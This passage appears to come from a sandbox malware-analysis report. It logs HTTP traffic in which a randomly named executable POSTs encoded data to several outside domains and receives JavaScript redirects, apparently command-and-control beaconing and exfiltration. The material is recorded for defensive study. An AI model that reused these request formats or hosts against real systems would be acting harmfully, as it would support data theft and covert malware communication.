                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.11.20497633.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:30.310297012 CEST854OUTPOST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 49 35 6d 4e 6f 7a 79 49 50 63 78 30 74 45 33 37 38 67 4c 75 44 6e 6f 31 6d 76 74 59 4a 45 2b 2b 43 6a 77 4c 2f 52 6c 6c 66 44 72 2b 6f 72 30 38 45 69 62 56 56 39 32 6b 58 78 75 78 72 2b 4f 57 39 39 32 5a 6d 4c 31 75 57 55 54 2b 42 62 7a 72 43 46 75 32 4c 33 65 37 4f 6c 69 6f 49 2f 52 77 6a 55 62 73 78 41 53 54 76 54 42 6c 58 33 4b 79 67 31 5a 58 31 55 66 46 4e 36 6c 44 76 77 6a 4d 32 74 44 79 69 66 55 4b 38 73 6c 34 39 62 30 35 33 33 46 61 4f 76 42 2b 4c 69 62 47 41 62 30 52 52 4d 32 65 51 58 55 67 4e 6b 4d 76 34 3d
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.11.20497643.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:32.979851961 CEST6445OUTPOST /bqye/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Origin: http://www.whats-in-the-box.org
                                                                                  Referer: http://www.whats-in-the-box.org/bqye/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 77 35 6d 2f 77 7a 30 72 58 63 77 30 74 45 2f 62 38 68 4c 75 44 6d 6f 31 2f 6d 74 59 55 7a 2b 38 36 6a 78 6f 6e 52 6b 52 7a 44 6c 2b 6f 72 32 38 45 6e 55 31 55 35 32 6b 48 39 75 31 4c 2b 4f 57 39 39 32 59 57 4c 69 76 57 55 52 2b 42 59 6e 37 43 42 2f 6d 4c 66 65 2f 62 51 69 6f 38 4a 45 51 44 55 61 4d 68 41 65 42 33 54 64 31 58 31 48 53 68 77 5a 58 35 66 66 45 6b 4c 6c 43 61 74 6a 4c 71 74 41 48 44 2f 4d 70 63 57 7a 36 46 46 78 4d 66 34 4f 73 4b 66 42 75 72 63 62 58 59 6f 34 68 31 67 6f 4e 64 44 45 6c 42 54 50 6f 74 4e 6b 6f 75 4c 52 6a 4a 78 36 70 67 44 62 36 72 74 67 58 2f 2f 2f 34 6f 34 53 37 6a 30 62 31 75 78 4e 78 61 50 6d 6b 6e 58 77 73 39 4f 50 64 65 4a 50 62 51 30 67 45 41 63 74 39 77 74 70 6e 6f 42 73 6c 57 67 71 7a 79 49 70 45 55 36 51 34 69 4b 33 6f 6a 38 65 44 63 51 59 6c 56 32 62 38 37 46 67 63 57 77 6e 31 31 35 50 6c 4b 6e 58 71 74 63 6b 64 73 70 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7w5m/wz0rXcw0tE/b8hLuDmo1/mtYUz+86jxonRkRzDl+or28EnU1U52kH9u1L+OW992YWLivWUR+BYn7CB/mLfe/bQio8JEQDUaMhAeB3Td1X1HShwZX5ffEkLlCatjLqtAHD/MpcWz6FFxMf4OsKfBurcbXYo4h1goNdDElBTPotNkouLRjJx6pgDb6rtgX///4o4S7j0b1uxNxaPmknXws9OPdeJPbQ0gEAct9wtpnoBslWgqzyIpEU6Q4iK3oj8eDcQYlV2b87FgcWwn115PlKnXqtckdspkgWaYtpNZxGrItuVWT9U0lS2bJDCyxnFIawQymokwNRjZg7AoHZwhBaIypjKqDJKioopZfKPRCidH4chjWmHpNlO3VAvdBJw4G8fY02vTE6LIj8HYvfewthROU3O06S/pyoi3LC7VW3istNYabDT8UPkxsAgMZSY7wy56LCNsDBRXAE+ceAJ8zdLCDzI+H8XMvukChrocE09oJQI9IYc32LXb2EC+hm0I4p1rEQ1esYbZ8xOavW/9SCEoWzba5Fx+0lWtfOQAeXTTD99lCFcB6jo4oZlgrUqR/AwNzqfVAv9t8R0KiHbPVTBNYfTSocBP97lEy8jFOEa2SUqUJk7k3cc9XbwjUB/zUogMY+QlVZnbo/VUQPryF2Hwii0wN2UI4/dQhmMlFwmnA/ndfFgnz4L+Ddl4aNaAkOoVQ+Cj/LL+Cgz78fUHc9xjzjwrxikx7672XlS6EKj9vLCWAdLVIHgA8Pm9EQimEQ4aFHwzHmrJVEfj8qrVVtJVyHUFx9NCO48hlFec51qBrFBstZwcDaOczsja2su+YSidREVp5ic3Gz4wFSUKcgv0NhEozeSMMbMzK3mDecAmmiTqadHPKvO27cW0KAUZiJSsGgga2PZyM20QwEO6ysHEQ8guKdHRn5Lt1A7i9YdZnmusKiJWyyPYnMRg6JoQ5 [TRUNCATED]
                                                                                  Sep 25, 2024 09:55:32.979970932 CEST1558OUTData Raw: 35 37 54 57 34 30 31 47 52 66 4f 5a 61 2b 54 62 50 33 55 6d 41 38 6b 57 33 44 50 43 36 52 56 49 57 50 4b 76 5a 7a 63 46 4f 6c 2b 35 50 2f 39 67 59 6b 66 37 30 4a 48 70 52 4d 46 44 6d 79 73 53 62 4c 69 38 59 6d 6d 45 44 77 6a 69 43 56 77 59 35 54
                                                                                  Data Ascii: 57TW401GRfOZa+TbP3UmA8kW3DPC6RVIWPKvZzcFOl+5P/9gYkf70JHpRMFDmysSbLi8YmmEDwjiCVwY5TFy/KbUfVTIG4LF94mXa5sV3cn2gl4VbNK8eb3D3A8QOjFGPobvv8BhCcUFxIksa4JJeyFZY9eW3tFav3cOOTzxGM40/dV1tvW2j6ZVuNp/trDCP9xKzU+oWkqvfzxlcF8xgqnuW+osIfPDO63NpymsiL3BvGhQowt


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.11.20497653.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:35.617120028 CEST554OUTGET /bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.whats-in-the-box.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:35.722799063 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:55:35 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 26 58 62 33 78 49 3d 6f 72 42 57 46 4d 34 54 4d 48 36 62 45 51 57 62 30 6d 75 66 6e 79 7a 38 2b 2f 39 7a 74 65 56 57 2f 2f 6c 53 35 50 31 55 56 70 5a 36 69 34 55 41 31 75 72 4b 6b 42 52 6f 6c 61 70 53 64 2b 44 30 71 56 76 56 2f 70 64 62 34 4f 4b 63 71 72 62 38 71 6d 69 55 37 66 38 53 77 2f 56 74 53 43 31 42 39 57 65 71 6d 6a 57 57 59 6c 49 68 72 6f 66 48 2f 37 75 36 45 2b 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.11.20497663.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:41.065438986 CEST816OUTPOST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6c 65 36 42 72 79 31 32 49 49 7a 76 78 62 54 6d 6b 6d 30 2b 49 54 30 42 30 67 6f 64 66 4e 72 4c 53 31 64 45 77 48 43 74 32 30 30 41 57 68 45 76 55 76 44 67 49 56 48 66 66 45 6b 7a 34 4a 64 73 30 34 39 7a 45 71 54 33 52 51 53 66 6d 78 2b 4f 49 55 6e 76 6a 6f 61 74 4d 52 62 38 62 41 33 6d 59 4f 6c 33 45 6b 51 6f 6e 45 51 67 63 37 52 32 46 78 2b 6f 38 43 53 68 43 6c 6b 56 63 2f 30 57 61 58 31 6b 6e 7a 73 30 39 63 55 6c 6a 72 6c 4e 78 39 58 52 2f 53 6f 62 56 45 38 6e 44 76 36 73 41 33 33 50 30 68 49 61 64 43 69 4e 57 53 42 79 71 38 52 43 55 67 3d 3d
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.11.20497673.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:43.699075937 CEST836OUTPOST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 50 4c 53 58 46 45 78 43 32 74 78 30 30 41 5a 42 45 75 4c 2f 44 33 49 56 43 69 66 46 30 7a 34 4e 31 73 30 35 4e 7a 48 5a 72 30 51 41 53 42 71 52 2b 49 56 45 6e 76 6a 6f 61 74 4d 52 50 47 62 45 62 6d 59 39 74 33 45 47 30 6e 6b 45 51 76 66 37 52 32 53 68 2b 73 38 43 54 45 43 67 41 76 63 39 38 57 61 56 74 6b 6d 69 73 37 6f 4d 55 6a 38 37 6b 6c 34 4d 69 6f 31 52 63 79 61 30 4d 43 42 63 2b 72 42 68 6d 56 70 54 38 2b 65 52 2b 2f 53 69 34 61 6f 2b 51 5a 4a 67 2f 4f 33 39 6a 72 67 61 4f 42 36 75 48 50 56 44 2b 66 46 36 6b 3d
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.11.20497683.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:46.340452909 CEST5156OUTPOST /was5/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Origin: http://www.linkwave.cloud
                                                                                  Referer: http://www.linkwave.cloud/was5/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 48 4c 53 45 4e 45 77 6c 61 74 77 30 30 41 51 68 45 56 4c 2f 44 32 49 52 75 75 66 46 34 4a 34 4c 78 73 6d 50 52 7a 50 4d 48 30 61 41 53 42 33 42 2b 4a 49 55 6e 66 6a 6f 4b 70 4d 52 66 47 62 45 62 6d 59 38 39 33 43 55 51 6e 69 45 51 67 63 37 52 71 46 78 2b 49 38 43 37 2b 43 68 42 59 64 4e 63 57 62 31 39 6b 6b 55 41 37 31 38 55 68 39 37 6b 39 34 4d 2b 4a 31 52 51 45 61 30 34 34 42 66 4f 72 41 41 50 36 37 58 6f 39 4c 42 71 39 59 7a 45 58 6b 38 5a 48 4a 44 7a 73 33 72 7a 64 68 66 47 4d 37 76 48 75 53 69 6e 55 53 2b 4d 51 73 67 65 77 4f 49 50 76 52 2f 51 45 58 54 2f 61 52 65 67 70 55 6c 42 33 52 59 66 6b 61 58 6b 6f 36 57 45 48 66 78 54 45 78 36 4f 2b 6d 71 44 6c 43 6e 34 53 52 66 57 6e 71 47 57 70 67 73 51 41 6e 56 35 65 55 33 6a 56 49 69 36 2b 77 43 55 4c 58 6e 37 59 44 51 41 59 36 2f 37 73 43 50 6b 78 35 7a 49 4a 56 50 67 62 43 38 64 67 62 47 4c 43 66 7a 6b 70 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+HLSENEwlatw00AQhEVL/D2IRuufF4J4LxsmPRzPMH0aASB3B+JIUnfjoKpMRfGbEbmY893CUQniEQgc7RqFx+I8C7+ChBYdNcWb19kkUA718Uh97k94M+J1RQEa044BfOrAAP67Xo9LBq9YzEXk8ZHJDzs3rzdhfGM7vHuSinUS+MQsgewOIPvR/QEXT/aRegpUlB3RYfkaXko6WEHfxTEx6O+mqDlCn4SRfWnqGWpgsQAnV5eU3jVIi6+wCULXn7YDQAY6/7sCPkx5zIJVPgbC8dgbGLCfzkp1RWZbUpoul2vc17ArWAjBP8FoMzVOCl6NYqLATUjhhsAGGY5YGJmgD67ARbJx/xPYVSllGqJOHFuUhncOyl9kYBYbtMPu/xo3yURGubxTnumY40ICfHCan67lyOchR3Z8Yx2jKdHacyA7GhH/eLAY4O29H5p8E8IqlQEKsFERb9iiQbA5Pb9mjbOH6HlLcoLKGr9//y6yQMh07ucAJnJSYRueumSZaYBBXoTXT3/OzcU0NQuSzFZHOVUKYXM0MbtC7NNohE9C9ZvH9IVgGkPgHtiN0ZRUKEBxqr29bui9ZNJIpUDQ/lF2QhTh/3IOrSnOagAlKPTmNtz/LGJ1BOM+SE1btf43VutQ3EcgxBbkzzLdVUJOS8K9xyZx40HF3TShVi15eJRk0OF9u6tzO4IB9x3QVl8W4lyF7AhPTYs3WlMoUuabsSQYsSysuW4nlbqn/rL9TZcgZuKLEr9NS3uq+eyoopr6cGjYfT5Dx+uDZsxzrlmczYDgbJzp/Kq+/HxuQX1KGmCBZ3xx8aY78FuXHuQ0GO/CZtJ1wu/tpkOdUbaUz8MxLiwmjJxbEGY2UxgAxu/oAIoh6JNJXEJl/l/dZieKHtIHooJMYBtaHPs2y1J/Dvqs34p765yBU42JUb2OaERxKzwbsJXCzcCGqiI48DIlbl2Ja8Ib2 [TRUNCATED]
                                                                                  Sep 25, 2024 09:55:46.340565920 CEST2829OUTData Raw: 34 54 71 77 2b 50 48 5a 51 77 5a 62 45 45 72 48 4b 54 70 46 32 74 77 30 42 42 54 4d 44 59 47 37 4c 31 5a 4e 2f 4e 6c 45 51 37 35 33 70 4a 4e 43 77 37 74 77 73 65 75 55 4f 48 7a 54 7a 4a 57 50 79 47 2f 6c 44 6f 55 77 6a 58 35 41 37 56 6f 34 61 58
                                                                                  Data Ascii: 4Tqw+PHZQwZbEErHKTpF2tw0BBTMDYG7L1ZN/NlEQ753pJNCw7twseuUOHzTzJWPyG/lDoUwjX5A7Vo4aX6PNnzm3l7Cn/f8KtFTQ4Knwg1l4TsXOSipjAsgVS3tCVHaeq07CvwLAw9SGkVy85wAxKLfX2UrBD7ZhW+NncaqlSaUxyQs/QytYrUO/gA0Y8gjf0oIoKTnQ3mgmHoiftH9LNJp7ukCcpY6xQ+R5nwnPO6fKzfcD2P


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.11.20497693.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:48.974328041 CEST548OUTGET /was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.linkwave.cloud
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:49.087491035 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:55:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 33 78 49 3d 79 38 4d 6e 44 33 43 41 55 6a 66 76 6c 62 43 61 78 41 56 61 63 36 33 47 76 4b 36 38 68 79 77 6b 56 51 63 6b 30 46 30 33 4d 4d 72 61 43 51 64 50 36 69 36 61 68 67 45 63 4b 53 39 39 53 38 6a 43 4d 41 66 52 64 31 45 67 76 59 42 49 6b 49 31 67 46 72 32 4a 4e 52 79 6d 6b 78 66 37 4b 55 72 50 69 62 69 71 49 7a 4b 34 50 43 4b 67 51 4e 39 71 48 69 77 56 6e 44 30 3d 26 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.11.204977084.32.84.32803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:54.508985996 CEST819OUTPOST /7k8f/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dfmagazine.shop
                                                                                  Origin: http://www.dfmagazine.shop
                                                                                  Referer: http://www.dfmagazine.shop/7k8f/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4d 70 75 50 44 42 76 4e 76 79 58 6c 30 6a 39 37 54 75 33 75 5a 4d 79 45 35 75 36 65 41 72 77 41 33 49 7a 2f 64 67 6d 35 78 76 39 39 4f 59 7a 75 46 70 47 77 2b 77 61 6c 61 6e 71 4a 41 69 64 2f 70 6d 44 43 34 79 34 72 48 43 44 69 41 56 41 32 6d 50 73 69 36 58 6f 74 42 6d 35 63 65 34 44 31 72 6a 73 31 38 42 70 49 61 6e 4a 55 47 70 77 79 55 45 4b 76 44 33 46 69 70 74 4a 42 62 71 6b 56 79 57 34 4b 34 4a 62 4e 43 68 56 77 4f 36 55 75 55 78 72 36 39 34 54 35 6c 38 54 52 32 41 32 52 70 77 30 56 64 6f 34 38 4d 42 44 45 66 38 52 35 50 49 65 4a 52 77 3d 3d
                                                                                  Data Ascii: Xb3xI=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
